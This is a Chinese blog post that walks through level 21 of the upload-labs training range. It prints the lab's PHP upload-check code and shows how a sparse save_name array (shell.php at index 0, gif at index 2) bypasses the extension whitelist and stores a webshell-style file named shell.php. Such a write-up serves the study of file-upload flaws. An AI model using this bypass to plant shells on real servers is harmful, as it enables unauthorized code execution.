upload-labs第21关分析与答案

已于 2024-05-06 21:50:57 修改
阅读量906 收藏 7
点赞数 7
分类专栏: web安全 文章标签: php http web安全
于 2024-03-10 19:59:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63279914/article/details/136607391
版权
文章详细分析了PHP代码中的文件上传安全漏洞,通过测试发现数组处理逻辑中的安全问题,展示了如何构造payload利用此漏洞上传shell.php文件。作者使用burpsuite抓包并演示了整个攻击过程和修复建议。
摘要由CSDN通过智能技术生成

upload-labs第21关审计1

第二十一关的参考代码
$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
    //检查MIME
    $allow_type = array('image/jpeg','image/png','image/gif');
    if(!in_array($_FILES['upload_file']['type'],$allow_type)){
        $msg = "禁止上传该类型文件!";
    }else{
        //检查文件名
        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
        if (!is_array($file)) {
            $file = explode('.', strtolower($file));
        }

        $ext = end($file);
        $allow_suffix = array('jpg','png','gif');
        if (!in_array($ext, $allow_suffix)) {
            $msg = "禁止上传该后缀文件!";
        }else{
            $file_name = reset($file) . '.' . $file[count($file) - 1];
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $msg = "文件上传成功!";
                $is_upload = true;
            } else {
                $msg = "文件上传失败!";
            }
        }
    }
}else{
    $msg = "请选择要上传的文件!";
}
第一步 分析if…else…分支

在第11行代码处,我们看到他做了一个判断,用is_array()函数判断了post请求传进来的参数是不是一个数组。

由此,我们就思考:post请求能不能传数组的类型参数呢

写一段简单的php代码测试一下

<?php
$file_name = $_POST['name'];
echo $file_name;
// var_dump($file_name)
?>

正常情况下的请求

在这里插入图片描述

下面我们来看看输入的post参数是数组会怎么样呢?

把代码写成

<?php
$file_name = $_POST['name'];
// echo $file_name;
var_dump($file_name)
?>

结果:

在这里插入图片描述

由此我们知道了post请求体是可以传数组

第二步 发现漏洞

我们去下面的判断找寻可能的漏洞

$ext = end($file); // 取数组最后一个
$allow_suffix = array('jpg','png','gif'); // 类型的白名单数组
if (!in_array($ext, $allow_suffix)) {
		$msg = "禁止上传该后缀文件!";
}

这段代码判断的是数组最后一个是不是在array('jpg','png','gif')这个数组中。

思考:

我们是不是可以在传参数的时候数组前面的是shell.php,而让最后一个是jpg,png,gif其中的一个实现绕过呢

再来看else的分支

$file_name = reset($file) . '.' . $file[count($file) - 1];

第一句就暴露了漏洞所在他用到的是reset()函数,取到的是数组第一个值。后面的count()是计算数组长度的,长度-1理论上应该与end()函数的值相同,但真的如此吗?

我们测试一下

<?php
$array_name = array();
$array_name[0]='zhangsan';
$array_name[2]='lisi';
echo reset($array_name).'<br>',end($array_name).'<br>',$array_name[count($array_name)-1] ;

?>

结果:
在这里插入图片描述

可见长度-1的参数竟然是undefined

第三步 构造payload

启动burpsuite截取上传文件时流量

在这里插入图片描述

发送到repeater模块修改参数

在这里插入图片描述

最后访问 upload/shell.php.文件

在这里插入图片描述

完成!!!

总结

payload为

$save_name=array();
$save_name[0]='shell.php';
$save_name[2]='gif';

这样的一个数组

在拼接的时候

$file_name = reset($file) . '.' . $file[count($file) - 1];
// reset($file)是数组第一个值 shell.php
// $file[count($file) - 1]是undefined 为空值

这样我们的文件名 拼接出来就是shell.php.

零星_AagT
关注
专栏目录
upload-labs 全21 write-up
ST0new的博客
03-06 4229
upload-labs 从经典靶场入手,看文件上传发展经历 下载 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20,每一都包含着不同上传方式。 下载地址:https://github.com/c0ny1/upload-labs/releases 在 win 环境下 直接解压到phpstudy下即可 绕过方式 从以下练习中提炼出文件上传的绕过方式 上传文件类型不收限制 前端Javascript
Upload-labs第17 二次渲染 gif图方法
sinat_33270167的博客
07-26 1409
Upload-labs第17 二次渲染 gif图方法
Upload-labs 1-21 靶场通笔记(含代码审计)
Innocence_0的博客
06-09 941
basename— 返回路径中的文件名部分给出一个包含有指向一个文件的全路径的字符串,本函数返回基本的文件名。Notebasename()纯粹基于输入字符串操作, 它不会受实际文件系统和类似 “..” 的路径格式影响。php?1) sudoers3) passwd4) etc5) .6)imagecreatefromgif():创建一块画布,并从 GIF 文件或 URL 地址载入一副图像。
upload-labs通(第20—第21
最新发布
qq_73985955的博客
08-06 375
如果我们没有修改这个文件后缀名,并且我们上传的php文件里面刚好是一句话的话,那保存为jpg文件后就又变成了图片马了,这时候只能使用文件包含漏洞或者解析漏洞来进行文件读取了。注意:思路二我们绕过的地方是upload-19.php这个地方,也就是我们保存的文件名的地方。:这也是可以使用文件包含漏洞来进行上传图片马,然后用蚁剑进行连接(这里不过多赘述):这可以使用文件包含漏洞来进行上传图片马,然后用蚁剑进行连接(这里不过多赘述)这的原理我也不太懂,我也是看了其他大佬的wp才知道这个方法的。
upload_labs靶机21超详细通
HEAVEN569的博客
02-16 1005
文件上传漏洞 upload_labs靶机练习 前言: 这是我练习文件上传漏洞时候,顺手整理下来的练习报告,本人小白一个从基础漏洞开始学习,有什么错误欢迎指出,勿喷。 因为不同地方下载的upload_labs靶机不一样,所以我这下面的卡顺序可能和你的不一样。 靶机地址:本机搭建的phpstudy http://127.0.0.1/upload/Pass-01/index.php 测试浏览器:火狐(firefox) 测试平台靶机:upload_labs Pass-01 1......
Upload-labs(21合集)
七天
12-23 926
由于开发人员在对用户文件上传部分的控制不足或者处理缺陷,导致的用户向服务器上上传可执行的动态脚本文件。 这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。"文件上传"本身没有问题,有问题的是文件上传后,服务器怎么处理文件。 靶场下载地址:https://github.com/c0ny1/upload-labs/ 网盘下载地址:https://pan.baidu.com/s/1ecVNi6XgE_yft5GNw-h-6w 提取码:qhsj 文章目录Pass-01Pass-02Pass-0
upload-labs了解upload那点事(21版本原理精细记录)
五分之一世纪
08-22 3189
文章目录<1>最简单的是前端<2>content-type很简单<3>文件后缀能改变<4>配置文件也不难<5>文件大写第六<6>空格与点七八<7>冒号data传文件<8>双写绕过十一<9>文件后缀零零断<10>注意文件头检验<11>两个函数来判断<12>二次渲染不一般<13>条件竞争难不难?<14>数组绕过难不难?<15>都
Upload-labs通攻略(适合新手)
夜思红尘的博客
04-12 2274
这是一篇upload-labs通攻略,适合新手
upload-labs 第20记录
mi900709的博客
12-09 1759
1、尝试各种姿势上传,全部失败,查看提示如下: 好吧,审计一下代码看下: $is_upload = false; $msg = null; if(!empty($_FILES['upload_file'])){ //检查MIME $allow_type = array('image/jpeg','image/png','image/gif'); if(!in_array($_FILES['upload_file']['type'],$allow_type)){
upload-labs通秘籍和安装环境
weixin_47543868的博客
12-18 8137
upload-labs通一.什么是upload-labs?二.漏洞三.安装环境四.小试牛刀第一 pass-01 客户端检测绕过(js检测)第二 pass-02 content-type(服务器端检测–MIME 类型)第三 上传可解析的文件后缀名第四 黑名绕过 .htaccess第五 黑名单 大小写绕过第六 黑名单 空格绕过第七 黑名单 点绕过第八 黑名单 ::$DATA第九 点 空格绕过黑名单第十 双写绕过黑名单第十一第十二第十三第十四第十五第十六第十七 一.什么
upload-labs通手册
12-03
详细记录了upload-labs靶场的通步骤,并且附带有caidao和burpsuite工具资源,非常适合初学者!!!
upload-labs.rar
03-19
Upload-labs是一个总结了所有类型的上传漏洞的靶场,包括常见的文件上传漏洞,可以进行多种类型漏洞的文件上传测试。
文件上传之upload-labs(一)
01-08
文件上传漏洞 通过上传攻击性文件(木马,病毒,恶意脚本)绕过检测到服务器并执行; 个人觉得不喜欢这些概念,通过实操更加能理解和掌握; 使用xampp、phpstudy、docker搭建upload-labs,三者都可,docker最方便但是我不是太熟悉,xampp安装的时候有很多工序,所以我选择的是phpstudy搭建了靶机环境,个人觉得学习文件上传用dvwa好一点,这个用来训练和复习,但是不得不说的是,至少前十题那个套路实在是没意思,下面是思维导图: 废话少说直接进入: 进入是这样的,开始训练吧。 pass-01: 新建一个PHP文件,使用一句话木马上传 提示我们文件类型不符合要求要上
upload-labs--wp(21
1stPeak's Blog
03-20 3173
第一题 不多说,直接上传 出现上图所示,如果你bp开启着抓包,你会发现,并没有抓到任何数据包,就被拦截了,这说明是前端验证没禁用js或修改前端代码即可 随后可以访问xx.php,url利用或C刀/蚁剑皆可 最后加个源码分析吧: function checkFile() { //定义一个名为checkFile的函数 var file = document.getElementsB...
upload-labs靶场学习笔记1-21
qq_56426046的博客
08-27 2286
服务器端使用白名单防御,修复 web 中间件的漏洞,禁止客户端存在可控参 数,存放文件目录禁止脚本执行,限制后缀名 一定要设置图片格式 jpg、gif 、 png 文件名随机的,不可预测。
Upload-labs(1-21详细教程)【简单易懂】【万字教程】
墨鱼菜鸡
09-10 4096
目录 思维导图 练习网站: 注意: 知识点 Pass-01 代码: 提示: 解题思路: Pass-02 知识点: 代码: 提示: 解题思路: Pass-03(本需要使用自己搭建upload-labs) 代码: 提示: 解题思路: Pass-04 代码: 提示: 解题思路: Pass-05(建议使用本机搭建的...
upload-labs 21大合集
wo41ge的博客
07-19 5138
upload-labs Pass-01 首先直接查看提示
新版phpstudy文件上传漏洞靶场:21upload-labs安装,及404错误解决
03-07 3838
使用新版phpstudy搭建上传漏洞
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

零星_AagT

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值